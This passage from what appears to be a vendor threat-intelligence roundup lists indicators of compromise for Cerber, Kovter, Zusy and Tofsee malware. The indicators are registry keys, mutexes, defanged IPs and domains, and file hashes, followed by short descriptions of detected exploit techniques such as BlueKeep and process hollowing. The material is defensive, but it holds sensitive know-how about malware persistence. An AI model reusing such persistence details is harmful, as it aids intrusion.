\n`\\README6.txt` | 76 \n`\\README7.txt` | 76 \n`\\README8.txt` | 76 \n`\\README9.txt` | 76 \n`%APPDATA%\\Mozilla\\Firefox\\profiles.ini` | 71 \n \n#### File Hashes\n\n` 01a47aefed5ad89958df66ceaaece3eb1028f5eb339b5fc405c365bf016652ae 0450d2d5b575c24bf8fc23859a53432ba1ea2bcb44bf9e143e1740c2643074f1 04d08fed39c68ff27751497d6cb543d8a7d082cd2efdda0515853a9fa0f8d70c 053eb4558f17ff9d2e8af9fc171f279b1a43be35a309ca1298f581eb332a8790 07e7472cce0ba35d0f9548372f2b93d56e5fe7597a8de0de337c3a2d96f2c69c 093b4505194249591522a9bed6abfc24d9911d4a64c89a51a46ac75d41a0f3a4 0bdf07fea4e8ae1e9d2e0bb4404770dd32eca713a3d6e1aeac9e61fe99925e46 0cf81c6a0a6181bbce5722c133852889b4dc09752453df36298179ef4d944deb 0ff03d25c9b864f54528b717a00fe970de388859ee81927a396621cf8dbf863b 1130c8c8e7efb0f284f7d6b8b1089668209ff18dba350d3e92fd79ad926043e7 1182d3ff1023ae91fb020eae5e94d8cbba61830118e0056fa3258a4e12759582 12df326da78cbb6da153914c68589ead268cace00a86085ea499c6f7f1562586 146c7a3b418c9b3525b2f5e87be07d252c25be2443600d3f72cddb45b8d3090c 149fa66f4458bb3300e1ff199d2f7f49922dce62980355b011625ed420215687 154c8df75639241776394de1d5c049f7851f0aef4471d4bf52d570707d0f768e 15e2104c27574da42e078a601acf2eb4c0bf70dabfaa9613b490fcb9b44a244f 17c184a6bb5976dcdc89a192409c80e9b4034334baf31017cff23fb2236316ca 180018cdf5693f805c584fa96443960fa18d94f98e17c8d9ebee15e33439a717 19eebbaaebcc15648f5a7c54b4090587cb63ff5ca61a18ea5261a9d5c4e20913 1ab04b2a9761d339b42f963aa0329e53e388b3c685ebb388cb7165cbd0eb7ee4 1b3b09c6ff6a035dba76d90f401127e58cc897895c077a9c5842b7d1890720f8 1d5d51d82b63ac0ad56d91b39f7b4d271a2e4413e90d36fcf38804dddd321018 209d05880be9d0626504cc03ad8c05b5f967186dfbbd6f7f020b377dd692fbed 20d5c1348fcefe4920bb03dd859a1967116a7f09f21fa30ba46c47b94d0bc259 20ec024bae45dadd7f89e4c2ac2d883135593e0d9de294c7d2d0daaaf7c024e9 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-eewJdIQGCt0/XY4FiSx9NfI/AAAAAAAACsI/W79lZX_S1n0PWJkQKBFrWdAyAwonLcaxQCLcBGAsYHQ/s1600/146c7a3b418c9b3525b2f5e87be07d252c25be2443600d3f72cddb45b8d3090c_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-HzFqzVDzQ8E/XY4FoqQ_wCI/AAAAAAAACsM/p9xUJAMNfLAKoH80zUIW-8Fj7FbJtWx1ACLcBGAsYHQ/s1600/bbc6fca24fa9320d0324e54db28a426176cf8d7155f1d54f182c0fb80ff4184e_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-yw5RX75Dk3w/XY4FuIx3uJI/AAAAAAAACsQ/kKWFx66JjDAM-dW3UncJm0iVYy0oetMwwCLcBGAsYHQ/s1600/59e8b9d12e4a7cb15bfe7805fed86449d826f3ae6e84b11e8be885e2f7c6511b_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Cerber-7174760-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 37 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 37 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 37 \n`shell.{<random GUID>}` | 22 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`94[.]22[.]172[.]0/27` | 37 \n`94[.]21[.]172[.]0/27` | 37 \n`94[.]23[.]172[.]0/25` | 37 \n`150[.]109[.]231[.]116` | 28 \n`3[.]225[.]205[.]112` | 19 \n`52[.]86[.]198[.]63` | 18 \n`178[.]128[.]255[.]179` | 9 \n`104[.]24[.]110[.]135` | 9 \n`104[.]24[.]111[.]135` | 8 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 37 \n`hjhqmbxyinislkkt[.]1j9r76[.]top` | 28 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 22 \n`chain[.]so` | 9 \n`bitaps[.]com` | 9 \n`btc[.]blockr[.]io` | 9 \nFiles and or directories created | Occurrences \n---|--- \n`<dir>\\_READ_THI$_FILE_<random, matching [A-F0-9]{4,8}>_.hta` | 37 \n`<dir>\\_READ_THI$_FILE_<random, matching [A-F0-9]{4,8}>_.txt` | 37 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 22 \n \n#### File Hashes\n\n` 0290d4b80c48806f165fc69f0ad6f61ae4279a3c4aa85f24a23f6166e2056880 0675dd9ca7d0258f82f849b923c9f73574f7dc18660243964af3ca5ff5f83263 09558b11776fef2c9fe97ce334bcde4ab8bda7e6befc0becf0e06899742a102e 0e64387a13170fd75c61600e8420aaa93249265813cda9555c47b1d09c1f5cb9 115efdb3253671c21f525ef951c3427c210b0d762e81230e1071927a9081aa69 17fba2ecea6df6d1097de2bdedfce13dfc93884cf0725cdc0144bd61c9b3c49b 1e1a3c08ab28baa17331e96a2741f193120d81be3728975a8617322ab59cacea 21261d7e4e8df88ed2b02b84d6089cb5a3967b4d720ae1316f587fdfb0502754 2eb147f2c94c81e3e031a7aaa8f5f46e94d30a27f957b694bb43d9c7700a9a2c 2f94adf1f16c33bc8fd151ff86278a076bc9a817410ba8c4fe70e3a47594f934 398e36ca258b2004f6532081a5f4f7b8487af2f2fc47999469db795186fbfaaf 3c61509268caa1ddfc237409e46456ae862d1b8f058c178073139013ebff5cba 4148780b48335a6080b75d9d881f2c8c4e876ff2d5a0e8787c6fb7fbb5880114 42d25d3a5e18cdd4293b7cc17d3037695a47104ed6f874411fdf1be067e849a0 4580ecc3393d75b0ce69a8458afe9d19f460d2a618d2607e7a04e4bcc0810ad4 4623e856d3a24d187a33c89ca3f4d9a0333cbde4e051fc7c5d612cf01231ec05 52d7d75140381ab82780710ccb60fbde8251b7f31b85e533ecaff7dbec9b4ca8 592c9b4c77c295aa32bb9774b3b968f9dc9d55c17faaadd92b4629d6def1ad61 60c82c336eb368cc3a24c141513b4cf3789a7db7133967adb57ef81287305b3b 63ae7ce0bc9774b278fd6c349aea2af5b83e5779691fed96074b98ec44f059b7 6ee82f9a8090b3a074b19472f4ba79fff42495c261814e85db46582a3824f595 7e727b8dccd44f0cfc6b3771806243ae8d68a643dbdb4bdc9c2b54bccee7284d 8ed9c0eb8ab59f127ddfb578d2ff65030eb22fcf11f129f7ad0e2b551245d79a 99f5973656d5950ded3d862340ff5f25770c82a4b93827075b8d11b76f7aeb4c a32ea31bc647853875b02c2ead84c6ad872ddc100185308d4978db841bd72f21 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-xRiPG6dRNYI/XY4GmZuYP_I/AAAAAAAACsk/cY2xvHtFukMCsHEeRJFekIk18-_Eu5fiwCLcBGAsYHQ/s1600/6ee82f9a8090b3a074b19472f4ba79fff42495c261814e85db46582a3824f595_amp.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-Kn4ravr0qxM/XY4GscSfwLI/AAAAAAAACso/Vp4nirgAaDA-iOZRL4poq7OkAo-My7UPgCLcBGAsYHQ/s1600/6ee82f9a8090b3a074b19472f4ba79fff42495c261814e85db46582a3824f595_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Kovter-7173679-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE \nValue Name: DisableOSUpgrade ` | 22 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE \nValue Name: ReservationsAllowed ` | 22 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\FC6A75BE78 \nValue Name: 0521341d ` | 22 \n`<HKCU>\\SOFTWARE\\FC6A75BE78 \nValue Name: 0521341d ` | 22 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\FC6A75BE78 \nValue Name: b5e001e3 ` | 22 \n`<HKCU>\\SOFTWARE\\FC6A75BE78 \nValue Name: b5e001e3 ` | 22 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\FC6A75BE78 \nValue Name: 0905afc0 ` | 20 \n`<HKCU>\\SOFTWARE\\FC6A75BE78 \nValue Name: 0905afc0 ` | 20 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\QYFTG2 \nValue Name: 3X3ii1 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\QYFTG2 \nValue Name: bDH1PvniwF ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\721AB795C7C67F3DC ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\0MI0EBD ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\18F3F1A771B2D052 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\EGDJPDTYRP ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\721AB795C7C67F3DC \nValue Name: 95635A6FA6E8366D ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\18F3F1A771B2D052 \nValue Name: CF87DF8672E1A15F ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\0MI0EBD \nValue Name: u0Lsan ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\0MI0EBD \nValue Name: DS2VgqHGE ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\EGDJPDTYRP \nValue Name: jPILeBsM9v ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\EGDJPDTYRP \nValue Name: kGvXXUg ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\EA246A9E9F458BD5954 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SVN2OQM ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\EA246A9E9F458BD5954 \nValue Name: 2CA8F0C3E2A3881649D ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SVN2OQM \nValue Name: Ck6a8biOX ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SVN2OQM \nValue Name: m7MJLVAz ` | 1 \nMutexes | Occurrences \n---|--- \n`C59C87A31F74FB56` | 22 \n`Global\\42EDC1955FE17AD4` | 22 \n`0D0D9BEBF5D08E7A` | 22 \n`1315B41013857E19` | 22 \n`BAD24FA07A7F6DD9` | 15 \n`863D9F083B3F4EDA` | 15 \n`Global\\EE662FBC96CBCB1A` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`176[.]111[.]49[.]43` | 2 \n`46[.]4[.]52[.]109` | 2 \n`209[.]214[.]91[.]122` | 1 \n`76[.]229[.]109[.]110` | 1 \n`220[.]85[.]229[.]169` | 1 \n`80[.]88[.]109[.]65` | 1 \n`59[.]164[.]225[.]69` | 1 \n`15[.]155[.]62[.]37` | 1 \n`216[.]150[.]65[.]196` | 1 \n`121[.]230[.]123[.]110` | 1 \n`6[.]213[.]48[.]113` | 1 \n`99[.]248[.]253[.]80` | 1 \n`77[.]80[.]6[.]37` | 1 \n`19[.]43[.]124[.]213` | 1 \n`118[.]121[.]204[.]109` | 1 \n`36[.]244[.]111[.]17` | 1 \n`142[.]100[.]180[.]91` | 1 \n`15[.]198[.]236[.]200` | 1 \n`209[.]194[.]106[.]166` | 1 \n`153[.]235[.]117[.]235` | 1 \n`110[.]145[.]21[.]95` | 1 \n`7[.]83[.]197[.]163` | 1 \n`223[.]108[.]247[.]60` | 1 \n`222[.]180[.]100[.]74` | 1 \n`72[.]139[.]210[.]78` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ottensen[.]de` | 1 \n`www[.]tastingtable[.]com` | 1 \n \n#### File Hashes\n\n` 2c09d76519ef840e68d07428643a76b32cc15672ea227b1a373ac68d25364446 3d98668f8b44ff601400103fa4aabac3b9066892f0d32d6ad680ebfd6e22dc16 49cda94863ca85a318f0990f2d092a05746ef7d961a595ec268f0c9cc45968a2 6eccd1f893534539a478c8ec9e9eba5c57095dc3ebf53c3b0c74c47a6b306b51 71533197271e536d08e551a226133c4e2efb1262521498b5d021c3b7e5458062 734eab522ba7c0c5c3afeb61a6e8cae6c3b4c5375716aa15541e388fe2d03547 949a7cec76633cc63b11f3748d304b88fa89ef679927e2911b46639c91c0f9ce 9856c913730a44ee3d02ef3b36ed9c6da721a5ec55118c367ba69926753e6a42 9e7bc2705e9c9d0173e6fb49bd400dc8ccaca56e51557c31c17c814c8256f3e2 b00b3dd9bef667e32501e21a13a8af398d8d8a9778e95f1df2c21746a08ee102 b36e6ed7ff386b9f4d5e8c0284fe177d08eca668d46e70aa48340b883d696e27 bb3cd50224232eb7809baa208fd5b14f9e9d1aed691c383092f7245c89005241 beeeed6fc246f493b6be8f65c76cd328995147069d5091f4e2d01e927e631fe7 c245b59592220a1b4cd08432e842cc391845b471fc2eeb494aa0cb57453cf6e8 d3bdca637e70ed87cdc31d97c7e46320f20b73ed7c4af1fa25e11e9efab8e9f7 d4413827ff12f897303b585bf28ddf3edd7d836a92847671a178dfc8dc48cb7c d5b5c2669ae45d436595ca86076208154f354de9a03135c23db20703ad034d08 d848892262acf288673c23c37be7f284b8b8747e8a424ed1ab342bfada5ff6b2 e4cd277d934fc543aea55870dd316bdf8b7437907a14332a441d6730ab4212e7 ede4f19e39c2e6c794c3ae97e5ba66b6eba29503ac8d71e9d84a10b697e8e5bb f6d37485e3e3f9412bd6eeb3767a17949cfb87ccfec649f1a4590d8ac189ab50 fe5e1062716fe717363599ee27f85553a1598dd5e7b9b16f83de57e828a04e03 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Yaa4OSeB43Q/XY4HRXPCVCI/AAAAAAAACsw/yWeDYQuGG3MqNXymb0OIz8bWn7i7h0yNACLcBGAsYHQ/s1600/2c09d76519ef840e68d07428643a76b32cc15672ea227b1a373ac68d25364446_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-F430_YuZV7g/XY4HVOyvSbI/AAAAAAAACs0/Ka1Q0qac7nUNneZHHYh-5X5lMoE1T7ErQCLcBGAsYHQ/s1600/2c09d76519ef840e68d07428643a76b32cc15672ea227b1a373ac68d25364446_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Zusy-7173469-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EEFEB657 ` | 25 \nMutexes | Occurrences \n---|--- \n`EEFEB657` | 79 \n`4A60888F` | 13 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]218[.]185[.]162` | 13 \n`216[.]218[.]206[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`brureservtestot[.]cc` | 9 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\AppData\\LocalLow\\EEFEB657` | 26 \n`%APPDATA%\\EEFEB657` | 26 \n`%APPDATA%\\EEFEB657\\bin.exe` | 25 \n`%APPDATA%\\4A60888F\\bin.exe` | 13 \n \n#### File Hashes\n\n` 00afaf857ac8a4185bf3c413a0e4ec739cee9a3add5587042176270e2ba45465 0a97cd074abef0a20d0abacc579a0cb8de4eacda90bff198c69c58635085000d 12688cb61170c54096bce727b51225e5ac0d7614389634dab3ffeb41c207eab9 12c1420737fc88fe942c45cfa08c071d1e71cc085d108a8822566ccb7b832384 13548f2c1a514d85d5b47f719dda62ddf24cb1c71283b048aa8171a218a03b26 17999d48dc7614dc4f5c9fb078575df2396a0ba5e255685185ed5d2e2eaf8c85 1ed34a43106c50971c74b903f431e6564356ca6d67aec1233e83a1294375331c 1eeb3abd65800306e131d3de28807d183b9b430d9383a210b783c17f2048c1ca 203bbe399a62a7c8d30cf540647495d8fa7de90d8cbb0d666a901444942e9d1d 24ec9675730ebbd18fb3ce3f206a9e655bb83cced94e9aa9413944d34d159be3 261eeef081001542bbb3a528323e03a2f451930e304283e12e6668a764a1cac2 275943755b7ac0ce098df1d040396388b28de93bd8afde32f09b70b85800de79 29a4810fe9a54f55f4ece5797c593c474f62abc0a6b5d3dc3b3a0b21199993e8 2f6fff7aedc91ca250f42ee261df91fd5dde94741c54e6bcec4177a83bd665d1 39c130462d81e7488499d5f82adbe21f6a6e4926c52302a3f8d5151712869e54 45c2a30595130a32670a68527863cda01572870ab58c49ea12fc26dfd7e1f835 4979596ca617c43eedb54615f3443252c34a94793c3b94d35c44fed705843626 4aa3743336f0260b0734175365b6d409170009e5c1f223cb18bcc53fd3ad9b46 5153276508219d637a03570d1a228dbb60846849cf5659fc189c4d23a6555aa3 5c2529c1e5e740724ff97ef607c65cd2eaa39a096c52947946815187bf406376 5f35edd69fac10f629c53ee3d067ee0cb811fa3bc089b3f6c3d5ea98240675f7 62a73bcebe68715f7c79346d5d43c1017efb469d906cb62cd95949f4fea00b09 684d0bba591a3d78b3720573fa348ce327ac3d9be0ae3e6c337a77dfb294861e 6a8b78f181b0391908613fc6bb362ef1a3d0500c2ee80204e8a8c9099ec56ab7 6b324fe79b3118bf435ff17c4192e606928deb54613c2601ec0c763955e64a1b `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-G_E8qtnFj8Y/XY4HmX8UlCI/AAAAAAAACtA/i8NaLlQHEVkHPZqn-UeaHq6YAinWt-V0wCLcBGAsYHQ/s1600/39c130462d81e7488499d5f82adbe21f6a6e4926c52302a3f8d5151712869e54_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-k0mbC-LBL2E/XY4Hp7mtDtI/AAAAAAAACtE/mR88fJStjv02TsvLqNqN5CJDZX2FDvtfACLcBGAsYHQ/s1600/a32fa768f3312721e0444eb9b157b5d395be10874620e853bda9ffbd7c0b1f7e_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-VfhwIT6bV6M/XY4Hwcn8CdI/AAAAAAAACtI/g77gEGnwoUEnRA_lIG_KGe72GcEqisqjQCLcBGAsYHQ/s1600/2b32ffb0a0bcb61882ac3907d11afd5428054ac7e9ee4aa6dabca24277e51dee_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Tofsee-7171939-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 10 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 10 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 10 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 6 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\nguazhnc ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qjxdckqf ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\gzntsagv ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 10 \n`69[.]55[.]5[.]250` | 10 \n`46[.]4[.]52[.]109` | 10 \n`176[.]111[.]49[.]43` | 10 \n`85[.]25[.]119[.]25` | 10 \n`144[.]76[.]199[.]2` | 10 \n`144[.]76[.]199[.]43` | 10 \n`43[.]231[.]4[.]7` | 10 \n`192[.]0[.]47[.]59` | 10 \n`173[.]194[.]207[.]26/31` | 10 \n`85[.]114[.]134[.]88` | 10 \n`172[.]217[.]197[.]26/31` | 9 \n`98[.]136[.]96[.]92/31` | 9 \n`172[.]217[.]5[.]228` | 8 \n`67[.]195[.]228[.]84` | 8 \n`67[.]195[.]204[.]72/30` | 8 \n`213[.]209[.]1[.]129` | 7 \n`216[.]146[.]35[.]35` | 7 \n`211[.]231[.]108[.]46` | 7 \n`104[.]47[.]53[.]36` | 7 \n`213[.]205[.]33[.]62/31` | 7 \n`188[.]125[.]72[.]73` | 7 \n`104[.]47[.]6[.]33` | 6 \n`23[.]160[.]0[.]108` | 6 \n`216[.]163[.]188[.]54` | 6 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 10 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 10 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 10 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 10 \n`whois[.]iana[.]org` | 10 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 10 \n`whois[.]arin[.]net` | 10 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 10 \n`eur[.]olc[.]protection[.]outlook[.]com` | 10 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 10 \n`aol[.]com` | 10 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 10 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 10 \n`honeypus[.]rusladies[.]cn` | 10 \n`marina99[.]ruladies[.]cn` | 10 \n`sexual-pattern3[.]com` | 10 \n`coolsex-finders5[.]com` | 10 \n`mta5[.]am0[.]yahoodns[.]net` | 9 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 9 \n`etb-1[.]mail[.]tiscali[.]it` | 8 \n`tiscalinet[.]it` | 8 \n`smtp-in[.]libero[.]it` | 7 \n`libero[.]it` | 7 \n`tiscali[.]it` | 7 \n`hanmail[.]net` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 10 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 10 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 10 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 8 \n`%TEMP%\\hjekdqa.exe` | 2 \n \n#### File Hashes\n\n` 08d08aedaab20d189db5d91b829e46d6485c9a80b0de1865ae66a6636a8f10a4 1060301d58657b07ab260d50e92c44112125ca9b225b049dafd428e47ff8c864 4518935de0954262f693d572260e01c37c5b3805358b4d8034f58a47208c15c3 7939dc52cea024666043b03e3dd324c3d0f24adb4cc9f05c75d45443eca6ffe7 8d1595bd4b6e37b043fbceffce01667b5a711cad028499a69285ced37db4a909 924242b90be9bca981b3ed8b7a7dcac8d6e192077d6ab0ce70d64390af8263a4 a97806cc79281fd6a5eb1f45b50787e5677f7a49c5e009629c260e2d33bc4dbb b34fc64ebd852b6e63c7926dff44f6bfee7d5b99201ace20f20c478162437410 c515f1bc8e5a44616976ea05ba3061b81670f5b5a2763b7abb2e9d0abcb62642 e6b5db7be9886ce7547bc05f42d87003215824316ac7126f3722518e7a1f6cd1 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-an28xcNtsEg/XY4IBSmNHLI/AAAAAAAACtY/ESpk9zq87sYWHabOU9Rlzne6lp56axp8QCLcBGAsYHQ/s1600/e6b5db7be9886ce7547bc05f42d87003215824316ac7126f3722518e7a1f6cd1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-9b5Xenq2fNE/XY4IGa_51wI/AAAAAAAACtg/ItWvf-ZhdGESTd1ujHA-r7zXMxTs3__eQCLcBGAsYHQ/s1600/e6b5db7be9886ce7547bc05f42d87003215824316ac7126f3722518e7a1f6cd1_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (9723) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (6212) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (1773) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nMadshi injection detected \\- (1501) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nProcess hollowing detected \\- (755) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nTrickbot malware detected \\- (636) \nTrickbot is a banking Trojan 